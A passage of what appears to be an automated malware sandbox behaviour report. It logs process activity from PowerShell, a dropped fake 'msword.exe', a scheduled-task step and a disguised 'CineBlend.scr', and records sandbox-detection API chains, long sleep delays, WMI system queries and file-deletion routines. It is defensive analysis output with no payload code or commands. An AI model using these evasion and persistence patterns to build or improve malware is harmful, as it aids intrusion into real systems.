Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_33-104786

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3884	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4611	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6284	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5532
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4204

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

API coverage: 4.1 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720	Thread sleep count: 3884 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720	Thread sleep count: 4611 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004	Thread sleep count: 6284 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004	Thread sleep count: 101 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1624	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7648	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2016	Thread sleep count: 5532 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2016	Thread sleep count: 4204 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2188	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com TID: 4660	Thread sleep time: -32000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_00406301 FindFirstFileW,FindClose,	15_2_00406301
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	15_2_00406CC7
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BBA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	33_2_00BBA087
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BBA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	33_2_00BBA1E2
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BAE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	33_2_00BAE472
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BBA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	33_2_00BBA570
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BB66DC FindFirstFileW,FindNextFileW,FindClose,	33_2_00BB66DC
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B7C622 FindFirstFileExW,	33_2_00B7C622
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BB73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	33_2_00BB73D4
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BB7333 FindFirstFileW,FindClose,	33_2_00BB7333
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BAD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	33_2_00BAD921
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	33_2_00BADC54

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 33_2_00B45FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

33_2_00B45FC8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\msword\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
